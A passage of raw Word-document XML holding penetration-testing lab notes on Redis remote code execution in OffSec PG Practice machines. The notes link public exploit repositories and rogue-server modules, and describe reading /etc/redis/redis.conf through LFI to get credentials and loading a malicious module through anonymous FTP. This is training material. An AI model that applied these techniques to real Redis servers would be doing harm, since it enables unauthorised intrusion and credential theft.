      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002948">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId859">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002949">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ah4s83keluk1" w:id="358"/>
      <w:bookmarkEnd w:id="358"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis Exploit Example 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Wombo PG practice and I put it at the top since it was the most straight forward Redis exploit. They saw Redis 5.0.9 in port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6379 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId860">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup (my favorite), they clearly explained how the github is not enough and you need an external shared library (.so file) in order to run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000294F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId861">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002950">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The .so file: </w:t>
      </w:r>
      <w:hyperlink r:id="rId862">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002951">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId863">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do the same thing but the process they used for creating .so file was a little more complicated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId864">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002953">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The github used to make the .so file: </w:t>
      </w:r>
      <w:hyperlink r:id="rId865">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/n0b0dyCN/RedisModules-ExecuteCommand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002954">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002955">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002956">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002957">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rorejl15ud0s" w:id="359"/>
      <w:bookmarkEnd w:id="359"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis Exploit Example 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002958">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId866">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002959">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They had an LFI exploit from the wordpress plugin. And then they tried using the Redis exploit (</w:t>
      </w:r>
      <w:hyperlink r:id="rId867">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) but it needed authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit was for Redis 4.x/5.x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So they used LFI to read </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/redis/redis.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which is where the credentials are stored. And then once they had authentication, they ran the exploit to get RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="534"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId868">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000295F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002960">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This other </w:t>
      </w:r>
      <w:hyperlink r:id="rId869">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice writeup used a different redis exploit but everything was the same</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1417"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId870">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/n0b0dyCN/redis-rogue-server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002962">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1417"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Redis(&lt;=5.0.5) RCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002963">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d0uj3g7y7wyd" w:id="360"/>
      <w:bookmarkEnd w:id="360"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis Exploit Example 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002964">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002965">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis 5.0.9 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId871">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. They used FTP for the exploit too. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002966">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId872">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writeup for it which ran into problems and tried multiple </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002967">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002968">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">official offsec writeup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Redis MODULE LOAD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002969">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we appear to have anonymous access to both Redis and anonymous FTP, we'll attempt to combine these two vulnerabilities to obtain remote code execution via the Redis MODULE LOAD command which allows us to dynamically load a Redis module from a local path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we'll create our module. We'll use the ExecuteCommand module from n0b0dyCN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000296F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloning into 'RedisModules-ExecuteCommand'...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002970">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
